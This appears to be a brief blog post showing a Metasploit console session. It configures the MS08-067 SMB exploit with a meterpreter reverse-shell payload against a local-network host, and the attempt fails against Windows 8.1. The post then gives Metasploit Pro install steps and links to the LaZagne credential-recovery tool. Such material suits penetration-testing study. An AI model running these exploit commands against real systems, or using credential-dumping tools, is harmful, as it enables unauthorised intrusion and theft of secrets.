https://www.youtube.com/watch?v=qvmKZE4LkyE
KALI LINUX INSTALLATION STEPS
INSTALACION DE KALI LINUX AQUI
ZEN CONSULTING
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_
payload => windows/meterpreter/reverse_
msf exploit(ms08_067_netapi) > set lhost 192.168.14.129
lhost => 192.168.14.129
msf exploit(ms08_067_netapi) > set rhost 192.168.15.58
rhost => 192.168.15.58
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rport 445
rport => 445
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.15.58 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh,
thread, process, none)
LHOST 192.168.14.129 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.14.129:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 8.1 - - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
msf exploit(ms08_067_netapi) >
Next steps to get started with Metasploit Pro
STEP 1: Download
STEP 2: Install
- Metasploit uses some of the same techniques as malware and malicious attackers to audit your security. For Metasploit to run properly, you must switch off anti-virus solutions and your local firewall before the installation and during its use. If you are not comfortable turning off defenses on this computer, consider installing Metasploit on a dedicated virtual machine (set virtual machine NIC to bridged mode). Ubuntu works great and doesn't incur any OS licensing fees.
- Once the download is complete, run the installer and follow the step by step instructions. This installer contains all Metasploit editions.
STEP 3: Activate
- An email containing your license key has been sent to the email address provided on the previous registration page. Insert your license key into Metasploit to activate Metasploit Pro edition.
- Note: It may take up to 15 mins to receive your license delivery email. Please check your spam folder, if you do not receive the email or cannot find the license key in the email, contact info@rapid7.com.
INTERESTING THIS NEW TOOL
https://github.com/AlessandroZ/LaZagne
No hay comentarios:
Publicar un comentario